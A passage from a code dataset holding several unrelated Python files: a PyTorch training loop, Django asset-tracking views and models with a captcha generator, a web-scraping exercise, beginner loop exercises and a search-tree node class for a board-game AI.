val_data = SetiDataset(\"val\", X_val, y_val, transform[\"albu_val\"])\n train_loader = DataLoader(train_data, **config.train_loader)\n val_loader = DataLoader(val_data, **config.val_loader)\n\n model = eval(config.model)(pretrained=False)\n if config.model == \"ResNet_18RS\":\n if config.dino_pretrained_path is not None:\n print(f\"load {config.dino_pretrained_path}\")\n state_dict = torch.load(\n config.dino_pretrained_path, map_location=\"cpu\"\n )[\"teacher\"]\n state_dict = {\n k.replace(\"module.\", \"\"): v for k, v in state_dict.items()\n }\n state_dict = {\n k.replace(\"backbone.\", \"\"): v for k, v in state_dict.items()\n }\n model.load_state_dict(state_dict, strict=False)\n else:\n resnetrs_init_weights(model)\n elif config.model == \"resnet18\":\n model = torchvision.models.resnet18(pretrained=False)\n state_dict = torch.load(config.dino_pretrained_path, map_location=\"cpu\")[\n \"teacher\"\n ]\n state_dict = {k.replace(\"module.\", \"\"): v for k, v in state_dict.items()}\n state_dict = {k.replace(\"backbone.\", \"\"): v for k, v in state_dict.items()}\n model.load_state_dict(state_dict, strict=False)\n\n if \"fc.weight\" in model.state_dict().keys():\n model.fc = nn.Linear(model.fc.in_features, config.train.num_labels)\n elif \"classifier.weight\" in model.state_dict().keys():\n model.classifier = nn.Linear(\n model.classifier.in_features, config.train.num_labels\n )\n elif \"head.fc.weight\" in model.state_dict().keys():\n model.head.fc = nn.Linear(\n model.head.fc.in_features, config.train.num_labels\n )\n elif \"head.weight\" in model.state_dict().keys():\n model.head = nn.Linear(model.head.in_features, config.train.num_labels)\n\n model = model.cuda()\n\n if config.use_SAM:\n optimizer = eval(config.optimizer.name)\n optimizer = SAM(\n model.parameters(),\n base_optimizer=optimizer,\n rho=0.15,\n adaptive=True,\n lr=config.optimizer.lr,\n )\n scheduler = eval(config.scheduler.name)(\n optimizer.base_optimizer,\n max(1, config.train.epoch // config.scheduler.cycle),\n eta_min=config.scheduler.eta_min,\n )\n else:\n optimizer = eval(config.optimizer.name)(\n model.parameters(), lr=config.optimizer.lr\n )\n scheduler = eval(config.scheduler.name)(\n optimizer,\n max(1, config.train.epoch // config.scheduler.cycle),\n eta_min=config.scheduler.eta_min,\n )\n\n criterion = eval(config.loss)()\n scaler = GradScaler()\n\n best_acc = 0\n best_loss = 1e10\n mb = master_bar(range(config.train.epoch))\n for epoch in mb:\n timer.add(\"train\")\n # if (config.model.simsiam_pretrained_path is not None) and epoch == 5:\n # model.requires_grad_(True)\n\n train_loss, train_rmse = train(\n config,\n model,\n transform[\"torch_train\"],\n strong_transform,\n train_loader,\n optimizer,\n criterion,\n mb,\n epoch,\n scaler,\n )\n train_time = timer.fsince(\"train\")\n\n timer.add(\"val\")\n val_loss, val_acc, oof_pred = validate(\n config, model, transform[\"torch_val\"], val_loader, criterion, mb, epoch\n )\n val_time = timer.fsince(\"val\")\n\n output1 = \"epoch: {} train_time: {} validate_time: {}\".format(\n epoch, train_time, val_time\n )\n output2 = \"train_loss: {:.3f} train_auc: {:.3f} val_loss: {:.3f} val_auc: {:.3f}\".format(\n train_loss, train_acc, val_loss, val_acc\n )\n logger.info(output1)\n logger.info(output2)\n mb.write(output1)\n mb.write(output2)\n csv_logger.write([fold, epoch, train_loss, train_acc, val_loss, val_acc])\n run[f\"fold_{fold}/train_loss\"].log(train_loss)\n run[f\"fold_{fold}/train_auc\"].log(train_acc)\n run[f\"fold_{fold}/val_loss\"].log(val_loss)\n run[f\"fold_{fold}/val_auc\"].log(val_acc)\n\n scheduler.step()\n\n if val_loss < best_loss:\n best_loss = val_loss\n save_name = Path(config.weight_path) / f\"best_loss_fold{fold}.pth\"\n save_model(save_name, epoch, val_loss, val_acc, model, optimizer)\n if val_acc > best_acc:\n best_acc = val_acc\n scores[fold] = best_acc\n train_df.loc[val_idx, \"oof_pred\"] = oof_pred\n save_name = Path(config.weight_path) / f\"best_acc_fold{fold}.pth\"\n save_model(save_name, epoch, val_loss, val_acc, model, optimizer)\n\n save_name = Path(config.weight_path) / f\"last_epoch_fold{fold}.pth\"\n save_model(save_name, epoch, val_loss, val_acc, model, optimizer)\n\n del model\n torch.cuda.empty_cache()\n\n train_df[[\"id\", \"target\", \"oof_pred\"]].to_csv(\n Path(config.pred_path) / \"oof_pred.csv\", index=False\n )\n\n run[\"mean_cv_auc\"] = np.mean(scores)\n run[\"oof_auc\"] = roc_auc_score(\n train_df[\"target\"].values, train_df[\"oof_pred\"].values\n )\n\n\n@torch.enable_grad()\ndef train(\n config,\n model,\n transform,\n strong_transform,\n loader,\n optimizer,\n criterion,\n mb,\n epoch,\n scaler,\n):\n preds = []\n gt = []\n losses = []\n scores = []\n\n model.train()\n for it, (images, labels) in enumerate(progress_bar(loader, parent=mb)):\n images = images.cuda()\n labels = labels.cuda()\n images = transform(images)\n\n if config.use_SAM:\n\n # first step\n if epoch < config.train.epoch - 5:\n with autocast():\n images, labels_a, labels_b, lam = strong_transform(\n images, labels, **config.strong_transform.params\n )\n logits = model(images)\n loss = criterion(logits, labels_a) * lam + criterion(\n logits, labels_b\n ) * (1 - lam)\n loss /= config.train.accumulate\n\n loss = (loss - config.flooding.b).abs() + config.flooding.b\n else:\n with autocast():\n logits = model(images)\n loss = criterion(logits, labels)\n loss /= config.train.accumulate\n\n loss.backward()\n if (it + 1) % config.train.accumulate == 0:\n optimizer.first_step(zero_grad=True)\n\n # second step\n if epoch < config.train.epoch - 5:\n with autocast():\n images, labels_a, labels_b, lam = strong_transform(\n images, labels, **config.strong_transform.params\n )\n logits = model(images)\n loss = criterion(logits, labels_a) * lam + criterion(\n logits, labels_b\n ) * (1 - lam)\n loss /= config.train.accumulate\n\n loss = (loss - config.flooding.b).abs() + config.flooding.b\n else:\n with autocast():\n logits = model(images)\n loss = criterion(logits, labels)\n loss /= config.train.accumulate\n\n loss.backward()\n if (it + 1) % config.train.accumulate == 0:\n optimizer.second_step(zero_grad=True)\n else:\n if epoch < config.train.epoch - 5:\n with autocast():\n images, labels_a, labels_b, lam = strong_transform(\n images, labels, **config.strong_transform.params\n )\n logits = model(images)\n loss = criterion(logits, labels_a) * lam + criterion(\n logits, labels_b\n ) * (1 - lam)\n loss /= config.train.accumulate\n\n loss = (loss - config.flooding.b).abs() + config.flooding.b\n else:\n with autocast():\n logits = model(images)\n loss = criterion(logits, labels)\n loss /= config.train.accumulate\n\n scaler.scale(loss).backward()\n if (it + 1) % config.train.accumulate == 0:\n scaler.step(optimizer)\n scaler.update()\n optimizer.zero_grad()\n\n logits = logits.sigmoid().detach().cpu().numpy().astype(float)\n labels = labels.detach().cpu().numpy().astype(int)\n score = log_loss(labels.reshape(-1), logits.reshape(-1))\n scores.append(score)\n preds.append(logits)\n gt.append(labels)\n losses.append(loss.item())\n\n mb.child.comment = \"loss: {:.3f} avg_loss: {:.3f} log_loss: {:.3f} avg_log_loss: {:.3f}\".format(\n loss.item(),\n np.mean(losses),\n score,\n np.mean(scores),\n )\n\n if config.loss == \"ROCStarLoss\":\n criterion.last_whole_y_t = torch.tensor(criterion.whole_y_t).cuda()\n criterion.last_whole_y_pred = torch.tensor(criterion.whole_y_pred).cuda()\n criterion.epoch_update_gamma(epoch)\n\n preds = np.concatenate(preds)\n gt = np.concatenate(gt)\n score = roc_auc_score(gt.reshape(-1), preds.reshape(-1))\n return np.mean(losses), score\n\n\n@torch.no_grad()\ndef validate(config, model, transform, loader, criterion, mb, device):\n preds = []\n gt = []\n losses = []\n\n if config.TTA:\n model = tta.ClassificationTTAWrapper(\n model=model, transforms=tta.aliases.flip_transform(), merge_mode=\"mean\"\n )\n model.eval()\n for it, (images, labels) in enumerate(progress_bar(loader, parent=mb)):\n images = images.cuda()\n labels = labels.cuda()\n images = transform(images)\n\n logits = model(images)\n loss = criterion(logits, labels) / config.train.accumulate\n\n logits = logits.sigmoid().cpu().numpy()\n labels = labels.cpu().numpy().astype(int)\n preds.append(logits)\n gt.append(labels)\n losses.append(loss.item())\n\n preds = np.concatenate(preds)\n gt = np.concatenate(gt)\n score = roc_auc_score(gt.reshape(-1), preds.reshape(-1))\n\n return np.mean(losses), score, preds\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575865799","text":"'''\n fmt = getattr(settings, 'LOG_FORMAT', None)\n lvl = getattr(settings, 'LOG_LEVEL', logging.DEBUG)\n\n logging.basicConfig(format=fmt, level=lvl)\n logging.debug(newobject.OrderId.id)\n '''\nfrom django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.http import JsonResponse\nfrom django.template.loader import render_to_string\n\nimport jdatetime\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.views.decorators import csrf\nimport django.core.serializers\nimport logging\nfrom django.conf import settings\n\nfrom cmms.models.Asset import *\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\n\n#from django.core import serializers\nimport json\nfrom django.forms.models import model_to_dict\nfrom cmms.forms import AssetLifeForm\nfrom cmms.business.updateAssetStatus import *\n###################################################################\n@csrf_exempt\ndef list_assetLife(request,id=None):\n books = AssetLife.objects.all()\n return render(request, 'cmms/asset_life/assetLifeList.html', {'assetLifes': books})\n\n\n###################################################################\n@csrf_exempt\ndef js_list_assetLife(request,woId):\n data=dict()\n books=AssetLife.objects.filter(assetLifeAssetid=woId).order_by('-id')[:5]\n\n data['html_assetLife_list']= render_to_string('cmms/asset_life/partialAssetLifelist.html', {\n 'assetLifes': books\n })\n data['form_is_valid']=True\n return JsonResponse(data)\n\n\n################################################################### ###################################################################\n@csrf_exempt\ndef save_assetLife_form(request, form, template_name,woId=None):\n data = dict()\n assetStatus=False\n\n if (request.method == 'POST'):\n \n\n if form.is_valid():\n\n form.save()\n data['form_is_valid'] = True\n\n books = AssetLife.objects.filter(assetLifeAssetid=woId).order_by('-id')[:5]\n data['html_assetLife_list'] = render_to_string('cmms/asset_life/partialAssetLifelist.html', {\n 'assetLifes': books\n })\n else:\n fmt = getattr(settings, 'LOG_FORMAT', None)\n lvl = getattr(settings, 'LOG_LEVEL', logging.DEBUG)\n logging.basicConfig(format=fmt, level=lvl)\n logging.debug(form.errors)\n\n\n\n\n\n\n\n context = {'form': form,'assetStatus':assetStatus}\n data['html_assetLife_form'] = render_to_string(template_name, context, request=request)\n return JsonResponse(data)\n\n###################################################################\n\n@csrf_exempt\ndef assetLife_delete(request, id):\n comp1 = get_object_or_404(AssetLife, id=id)\n data = dict()\n\n if (request.method == 'POST'):\n comp1.delete()\n data['form_is_valid'] = True # This is just to play along with the existing code\n companies = AssetLife.objects.all()\n data['html_assetLife_list'] = render_to_string('cmms/asset_life/partialAssetLifelist.html', {\n 'assetLife': companies\n })\n else:\n context = {'assetLife': comp1}\n data['html_assetLife_form'] = render_to_string('cmms/asset_life/partialAssetLifeDelete.html',\n context,\n request=request,\n )\n return JsonResponse(data)\n###################################################################\n@csrf_exempt\ndef assetLife_create(request,assetId=None):\n woId=-1\n if(assetId!=None):\n woId=assetId\n\n if (request.method == 'POST'):\n body_unicode = request.body.decode('utf-8')\n body = json.loads(body_unicode)\n print(body)\n\n\n data = request.POST.dict()\n data['assetLifeAssetid']=body['assetLifeAssetid']\n data['assetOfflineFrom']=body['assetOfflineFrom']\n data['assetSetOfflineByUser']=body['assetSetOfflineByUser']\n data['assetOfflineStatus']=body['assetOfflineStatus']\n data['assetWOAssoc']=body['assetWOAssoc']\n data['assetOfflineAdditionalInfo']=body['assetOfflineAdditionalInfo']\n data['assetEventType']=body['assetEventType']\n data['assetEventDescription']=body['assetEventDescription']\n woId=body['assetLifeAssetid']\n print(\"dsadsadsa%%%%%%%\"+str(body['assetOnlineStatus']))\n if (body['assetOnlineStatus']!=-1):\n\n data['assetOnlineFrom']=body['assetOnlineFrom']\n data['assetSetOnlineByUser']=body['assetSetOnlineByUser']\n\n data['assetOnlineStatus']=body['assetOnlineStatus']\n data['assetOnlineAdditionalInfo']=body['assetOnlineAdditionalInfo']\n data['assetOnlineProducteHourAffected']=body['assetOnlineProducteHourAffected']\n\n\n\n form = AssetLifeForm(data)\n # AssetStatus.ReverseAssetStatus(woId)\n\n\n\n\n else:\n form = AssetLifeForm()\n\n return save_assetLife_form(request, form, 'cmms/asset_life/partialAssetLifeCreate.html',woId)\n###################################################################\n\n@csrf_exempt\ndef assetLife_update(request, id):\n company= get_object_or_404(AssetLife, id=id)\n woId=company.assetLifeAssetid\n #parrent asset\n\n\n if (request.method == 'POST'):\n\n body_unicode = request.body.decode('utf-8')\n body = json.loads(body_unicode)\n\n\n data = request.POST.dict()\n\n data['assetLifeAssetid']=body['assetLifeAssetid']\n data['assetOfflineFrom']=body['assetOfflineFrom']\n data['assetSetOfflineByUser']=body['assetSetOfflineByUser']\n data['assetOfflineStatus']=body['assetOfflineStatus']\n data['assetWOAssoc']=body['assetWOAssoc']\n data['assetOfflineAdditionalInfo']=body['assetOfflineAdditionalInfo']\n data['assetEventType']=body['assetEventType']\n data['assetEventDescription']=body['assetEventDescription']\n\n if (body['assetOnlineStatus']!=-1):\n\n data['assetOnlineFrom']=body['assetOnlineFrom']\n data['assetSetOnlineByUser']=body['assetSetOnlineByUser']\n\n data['assetOnlineStatus']=body['assetOnlineStatus']\n data['assetOnlineAdditionalInfo']=body['assetOnlineAdditionalInfo']\n data['assetOnlineProducteHourAffected']=body['assetOnlineProducteHourAffected']\n woId.assetStatus=True\n woId.save()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n form = AssetLifeForm(data, instance=company)\n else:\n\n\n\n form = AssetLifeForm(instance=company)\n\n\n return save_assetLife_form(request, form, 'cmms/asset_life/partialAssetLifeUpdate.html',woId.id)\n################################################################### ###################################################################\n@csrf_exempt\ndef saveUpdate_assetLife_form(request, form, template_name,woId=None,assetStatus=None):\n data = dict()\n\n\n if (request.method == 'POST'):\n print(request.POST)\n print(\"here is good\")\n\n if form.is_valid():\n\n form.save()\n data['form_is_valid'] = True\n\n books = AssetLife.objects.filter(assetLifeAssetid=woId).order_by('-id')[:5]\n data['html_assetLife_list'] = render_to_string('cmms/asset_life/partialAssetLifelist.html', {\n 'assetLifes': books\n })\n else:\n fmt = getattr(settings, 'LOG_FORMAT', None)\n lvl = getattr(settings, 'LOG_LEVEL', logging.DEBUG)\n logging.basicConfig(format=fmt, level=lvl)\n logging.debug(form.errors)\n\n\n\n\n\n context = {'form': form,'assetStatus':assetStatus}\n data['html_assetLife_form'] = render_to_string(template_name, context, request=request)\n return JsonResponse(data)\n","sub_path":"cmms/views/assetlifeview.py","file_name":"assetlifeview.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"383690271","text":"#!/usr/bin/python3\n\nfrom insane.Parser import Parser\nfrom insane.Core import Core\n\ndef main():\n parser = Parser(\"sample/little.in\")\n parser.display()\n\n # create the environment\n core = Core(parser.getRows(), parser.getColumns(), parser.getDrones(), parser.getDeadline(), parser.getMaxDroneLoad())\n\n # create the products type\n weights = parser.getWeights()\n for weight in weights:\n core.addProductType(int(weight))\n\n # create warehouses with products\n warehouses = parser.getWarehouses()\n for id, warehouse in warehouses.items():\n wareHouseId = core.addWareHouse(int(warehouse[0][0]), int(warehouse[0][1]))\n i = 0\n for product in warehouse[1]:\n core.addProductWareHouse(wareHouseId, i, product)\n i += 1\n\n orders = parser.getOrders()\n for id, order in orders.items():\n orderId = core.addOrder(order[0][0], order[0][1])\n for product in order[2]:\n core.addItemOrder(orderId, int(product), 1)\n\n core.printAll()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211854720","text":"# print all integers from 0 to 150\n\nfor x in range(151):\n print(x)\n\n\n# Print all the multiples of 5 from 5 to 1,000\n\nfor i in range(5,1001,5):\n print(i)\n\n\n#Print integers 1 to 100. if divisible by 5, print \"Coding\" instead. If divisble by 10, print \"Coding Dojo\"\n\nfor i in range(101):\n if i % 5 == 0:\n print(\"Coding\")\n if i % 10 == 0:\n print(\"Coding Dojo\")\n else:\n print(i)\n\n\n# add odd integers from 0 to 500,000 and print the final sum \n\nsum = 0\n\nfor i in range(1,500001,2):\n sum += i\n\nprint(sum)\n\n\n# print postive numbers starting at 2018, counting down by fours. \n\nfor i in range(2018, 0, -4):\n print(i)\n\n# Set three variables: lowNum, highNum, mult. \n# Starting at lowNum and going through highNum, print only the integers that are a multiple of mult.\n# For example, if lowNum = 2, highNum = 9, and mult = 3, the loop should print 3, 6, 9 (on successive lines)\n\nlowNum = 2\nhighNum = 9\nmult = 3\n\nfor i in range(lowNum,highNum+1,1):\n if i % mult == 0:\n print(i)\n","sub_path":"python_stack/python/fundamentals/for_loop_basic1.py","file_name":"for_loop_basic1.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444182548","text":"#! /usr/local/bin/python2.7\r\n\r\nf = open(\"/root/oasis_provisioning_bot/oasis_log.txt\",\"r\")\r\n\r\n\r\nfor line in (f.readlines() [-10:]):\r\n print (line)\r\n \r\n\r\n\r\n\r\n\r\n\r\nquit()\r\nprint(f.read(-1))\r\nquit()\r\n\r\nfor line in f.read:\r\n print (type(line))\r\n quit()\r\n\r\n\r\n\r\n\r\n# cat = f.readlines()\r\n# for i in cat[-2]:\r\n # print(i)\r\n \r\n# print(len(cat))\r\n \r\n","sub_path":"tail_last10_lines.py","file_name":"tail_last10_lines.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120345430","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport ssl\n\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\ncnt = 0\nnamelnks = []\nurl = \"http://py4e-data.dr-chuck.net/known_by_Beinn.html\"\nwhile cnt < 7:\n html = urlopen(url, context=ctx).read()\n soup = BeautifulSoup(html, \"html.parser\")\n namelnks = []\n tags = soup('a')\n for tag in tags:\n namelnks.append(tag.get('href', None))\n cnt += 1\n url = namelnks[17]\n print(url)","sub_path":"OnlineClasses/Programming for Everybody/Class3/ex12_6.py","file_name":"ex12_6.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"396340137","text":"import hashlib\nimport re\n\n\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django import forms\n\nimport os\nimport random\n\nfrom io import BytesIO\n\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom PIL.ImageDraw import Draw\nfrom PIL.ImageFont import truetype\n\n# Create your models here.\nclass Subject(models.Model):\n \"\"\"学科\"\"\"\n no = models.IntegerField(primary_key=True, verbose_name='编号')\n name = models.CharField(max_length=20, verbose_name='名称')\n intro = models.CharField(max_length=511, default='', verbose_name='介绍')\n create_date = models.DateField(null=True, verbose_name='成立日期')\n is_hot = models.BooleanField(default=False, verbose_name='是否热门')\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = 'tb_subject'\n verbose_name = '学科'\n verbose_name_plural = '学科'\n\n\nclass Teacher(models.Model):\n \"\"\"老师\"\"\"\n no = models.AutoField(primary_key=True, verbose_name='编号')\n name = models.CharField(max_length=20, verbose_name='姓名')\n detail = models.CharField(max_length=1023, default='', blank=True, verbose_name='详情')\n photo = models.CharField(max_length=1023, default='', verbose_name='照片')\n good_count = models.IntegerField(default=0, verbose_name='好评数')\n bad_count = models.IntegerField(default=0, verbose_name='差评数')\n subject = models.ForeignKey(to=Subject, on_delete=models.PROTECT, db_column='sno', verbose_name='所属学科')\n\n class Meta:\n db_table = 'tb_teacher'\n verbose_name = '老师'\n verbose_name_plural = '老师'\n\nclass User(models.Model):\n \"\"\"用户\"\"\"\n no = models.AutoField(primary_key=True, verbose_name='编号')\n username = models.CharField(max_length=20, unique=True, verbose_name='用户名')\n password = models.CharField(max_length=32, verbose_name='密码')\n regdate = models.DateTimeField(auto_now_add=True, verbose_name='注册时间')\n\n class Meta:\n db_table = 'tb_user'\n verbose_name_plural = '用户'\n\n\nUSERNAME_PATTERN = re.compile(r'\\w{4,20}')\n\n\ndef to_md5_hex(message):\n return hashlib.md5(message.encode()).hexdigest()\n\nclass RegisterForm(forms.ModelForm):\n repassword = forms.CharField(min_length=8, max_length=20)\n\n def clean_username(self):\n username = self.cleaned_data['username']\n if not USERNAME_PATTERN.fullmatch(username):\n raise ValidationError('用户名由字母、数字和下划线构成且长度为4-20个字符')\n return username\n\n def clean_password(self):\n password = self.cleaned_data['password']\n if len(password) < 8 or len(password) > 20:\n raise ValidationError('无效的密码,密码长度为8-20个字符')\n return to_md5_hex(self.cleaned_data['password'])\n\n def clean_repassword(self):\n repassword = to_md5_hex(self.cleaned_data['repassword'])\n if repassword != self.cleaned_data['password']:\n raise ValidationError('密码和确认密码不一致')\n return repassword\n\n class Meta:\n model = User\n exclude = ('no', 'regdate')\n\n\nclass Bezier(object):\n \"\"\"贝塞尔曲线\"\"\"\n\n def __init__(self):\n self.tsequence = tuple([t / 20.0 for t in range(21)])\n self.beziers = {}\n\n def make_bezier(self, n):\n \"\"\"绘制贝塞尔曲线\"\"\"\n try:\n return self.beziers[n]\n except KeyError:\n combinations = pascal_row(n - 1)\n result = []\n for t in self.tsequence:\n tpowers = (t ** i for i in range(n))\n upowers = ((1 - t) ** i for i in range(n - 1, -1, -1))\n coefs = [c * a * b for c, a, b in zip(combinations,\n tpowers, upowers)]\n result.append(coefs)\n self.beziers[n] = result\n return result\n\n\nclass Captcha(object):\n \"\"\"验证码\"\"\"\n\n def __init__(self, width, height, fonts=None, color=None):\n self._image = None\n self._fonts = fonts if fonts else \\\n [os.path.join(os.path.dirname(__file__), 'fonts', font)\n for font in ['ArialRB.ttf', 'ArialNI.ttf', 'Georgia.ttf', 'Kongxin.ttf']]\n self._color = color if color else random_color(0, 200, random.randint(220, 255))\n self._width, self._height = width, height\n\n @classmethod\n def instance(cls, width=200, height=75):\n prop_name = f'_instance_{width}_{height}'\n if not hasattr(cls, prop_name):\n setattr(cls, prop_name, cls(width, height))\n return getattr(cls, prop_name)\n\n def background(self):\n \"\"\"绘制背景\"\"\"\n Draw(self._image).rectangle([(0, 0), self._image.size],\n fill=random_color(230, 255))\n\n def smooth(self):\n \"\"\"平滑图像\"\"\"\n return self._image.filter(ImageFilter.SMOOTH)\n\n def curve(self, width=4, number=6, color=None):\n \"\"\"绘制曲线\"\"\"\n dx, height = self._image.size\n dx /= number\n path = [(dx * i, random.randint(0, height))\n for i in range(1, number)]\n bcoefs = Bezier().make_bezier(number - 1)\n points = []\n for coefs in bcoefs:\n points.append(tuple(sum([coef * p for coef, p in zip(coefs, ps)])\n for ps in zip(*path)))\n Draw(self._image).line(points, fill=color if color else self._color, width=width)\n\n def noise(self, number=50, level=2, color=None):\n \"\"\"绘制扰码\"\"\"\n width, height = self._image.size\n dx, dy = width / 10, height / 10\n width, height = width - dx, height - dy\n draw = Draw(self._image)\n for i in range(number):\n x = int(random.uniform(dx, width))\n y = int(random.uniform(dy, height))\n draw.line(((x, y), (x + level, y)),\n fill=color if color else self._color, width=level)\n\n def text(self, captcha_text, fonts, font_sizes=None, drawings=None, squeeze_factor=0.75, color=None):\n \"\"\"绘制文本\"\"\"\n color = color if color else self._color\n fonts = tuple([truetype(name, size)\n for name in fonts\n for size in font_sizes or (65, 70, 75)])\n draw = Draw(self._image)\n char_images = []\n for c in captcha_text:\n font = random.choice(fonts)\n c_width, c_height = draw.textsize(c, font=font)\n char_image = Image.new('RGB', (c_width, c_height), (0, 0, 0))\n char_draw = Draw(char_image)\n char_draw.text((0, 0), c, font=font, fill=color)\n char_image = char_image.crop(char_image.getbbox())\n for drawing in drawings:\n d = getattr(self, drawing)\n char_image = d(char_image)\n char_images.append(char_image)\n width, height = self._image.size\n offset = int((width - sum(int(i.size[0] * squeeze_factor)\n for i in char_images[:-1]) -\n char_images[-1].size[0]) / 2)\n for char_image in char_images:\n c_width, c_height = char_image.size\n mask = char_image.convert('L').point(lambda i: i * 1.97)\n self._image.paste(char_image,\n (offset, int((height - c_height) / 2)),\n mask)\n offset += int(c_width * squeeze_factor)\n\n @staticmethod\n def warp(image, dx_factor=0.3, dy_factor=0.3):\n \"\"\"图像扭曲\"\"\"\n width, height = image.size\n dx = width * dx_factor\n dy = height * dy_factor\n x1 = int(random.uniform(-dx, dx))\n y1 = int(random.uniform(-dy, dy))\n x2 = int(random.uniform(-dx, dx))\n y2 = int(random.uniform(-dy, dy))\n warp_image = Image.new(\n 'RGB',\n (width + abs(x1) + abs(x2), height + abs(y1) + abs(y2)))\n warp_image.paste(image, (abs(x1), abs(y1)))\n width2, height2 = warp_image.size\n return warp_image.transform(\n (width, height),\n Image.QUAD,\n (x1, y1, -x1, height2 - y2, width2 + x2, height2 + y2, width2 - x2, -y1))\n\n @staticmethod\n def offset(image, dx_factor=0.1, dy_factor=0.2):\n \"\"\"图像偏移\"\"\"\n width, height = image.size\n dx = int(random.random() * width * dx_factor)\n dy = int(random.random() * height * dy_factor)\n offset_image = Image.new('RGB', (width + dx, height + dy))\n offset_image.paste(image, (dx, dy))\n return offset_image\n\n @staticmethod\n def rotate(image, angle=25):\n \"\"\"图像旋转\"\"\"\n return image.rotate(random.uniform(-angle, angle),\n Image.BILINEAR, expand=1)\n\n def generate(self, captcha_text='', fmt='PNG'):\n \"\"\"生成验证码(文字和图片)\"\"\"\n self._image = Image.new('RGB', (self._width, self._height), (255, 255, 255))\n self.background()\n self.text(captcha_text, self._fonts,\n drawings=['warp', 'rotate', 'offset'])\n self.curve()\n self.noise()\n self.smooth()\n image_bytes = BytesIO()\n self._image.save(image_bytes, format=fmt)\n return image_bytes.getvalue()\n\n\ndef pascal_row(n=0):\n \"\"\"生成Pascal三角第n行\"\"\"\n result = [1]\n x, numerator = 1, n\n for denominator in range(1, n // 2 + 1):\n x *= numerator\n x /= denominator\n result.append(x)\n numerator -= 1\n if n & 1 == 0:\n result.extend(reversed(result[:-1]))\n else:\n result.extend(reversed(result))\n return result\n\n\ndef random_color(start=0, end=255, opacity=255):\n \"\"\"获得随机颜色\"\"\"\n red = random.randint(start, end)\n green = random.randint(start, end)\n blue = random.randint(start, end)\n if opacity is None:\n return red, green, blue\n return red, green, blue, opacity\n\n# class LoginForm(forms.Form):\n# username = forms.CharField(min_length=4, max_length=20)\n# password = forms.CharField(min_length=8, max_length=20)\n# captcha = forms.CharField(min_length=4, max_length=4)\n#\n# def clean_username(self):\n# username = self.cleaned_data['username']\n# if not USERNAME_PATTERN.fullmatch(username):\n# raise ValidationError('无效的用户名')\n# return username\n#\n# def clean_password(self):\n# return to_md5_hex(self.cleaned_data['password'])","sub_path":"Django_practice/hellodjango/vote/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"283128449","text":"import utils\nimport functools\n\n\n@functools.total_ordering\nclass Node:\n \"\"\"\n Node class\n\n for using search tree and contains state and the action from last move.\n the cost g and f (g + heuristic) are stored as well!\n\n built for project pA of COMP30024\n Authors: Xinyao Niu (900721), Maoting Zuo (901116)\n Team Name: VanGame\n \"\"\"\n\n def __init__(self, pre_node: 'node' = None, state: dict = None,\n transition_action: str = \"\", g=0) -> None:\n \"\"\"\n constructor\n * pre_node -- parent node on the tree (None by default)\n * state -- current state (None by default)\n * transition_action -- output string for this node, will be used in backtrace\n * g -- cost so far to achieve this state\n \"\"\"\n\n # string of the action that how state are transfer from last node to this node\n self.transition_action = transition_action\n self.pre_node = pre_node\n self.g = g\n self.state = state\n\n # calculate heuristic when initializing the node\n self.f = self.g + self.heuristic(self.state)\n\n def __lt__(self, other):\n \"\"\"\n function override for using comparision operators.\n \"\"\"\n return self.f < other.f\n\n def __eq__(self, other):\n \"\"\"\n function override for using comparision operators.\n \"\"\"\n\n return self.f == other.f and self.g == other.g and self.state == other.state\n\n @staticmethod\n def heuristic(state):\n \"\"\"\n heuristic function\n \"\"\"\n\n # sum of all move/2 + jump from the position of\n # each piece to their closest goal\n # (proof of admissible refer to the report)\n h = 0\n\n for p in state[\"players\"]:\n\n min_distance_from_goal = utils.COST[p]\n h = h + min_distance_from_goal\n\n return h\n\n def _newNode(self, old_coord: tuple, new_coord: tuple = None, transition_action=\"\"):\n \"\"\"\n private (well..)function for generating new nodes\n \"\"\"\n\n new_state = {\"players\": self.state[\"players\"].copy()}\n\n # remove old position\n # if taken EXIT action, then remove it without appending new position\n new_state[\"players\"].remove(old_coord)\n\n # Only append when all the piece has valid position in the next state\n if new_coord:\n new_state[\"players\"].add(new_coord)\n\n new_state[\"goals\"] = self.state[\"goals\"]\n new_state[\"blocks\"] = self.state[\"blocks\"]\n\n new_node = Node(self, new_state, g=(self.g + 1),\n transition_action=transition_action)\n\n return new_node\n\n def expand(self) -> list:\n \"\"\"\n this method are trying to find all the possible movement\n (except its parent node state) for all the available pieces on the\n board as next possible states based on the current position\n of pieces, and regard them as the child of this node. Notice\n that we assume moving back and forth does not give us a\n optimal solution.\n \"\"\"\n\n # delta x and y from any position to its neighbourhood (move)\n move = [\n [0, -1],\n [1, -1],\n [1, 0],\n [0, 1],\n [-1, 1],\n [-1, 0]\n ]\n\n # delta x and y from any position to its possible move (jump)\n jump = [\n [0, -2],\n [2, -2],\n [2, 0],\n [0, 2],\n 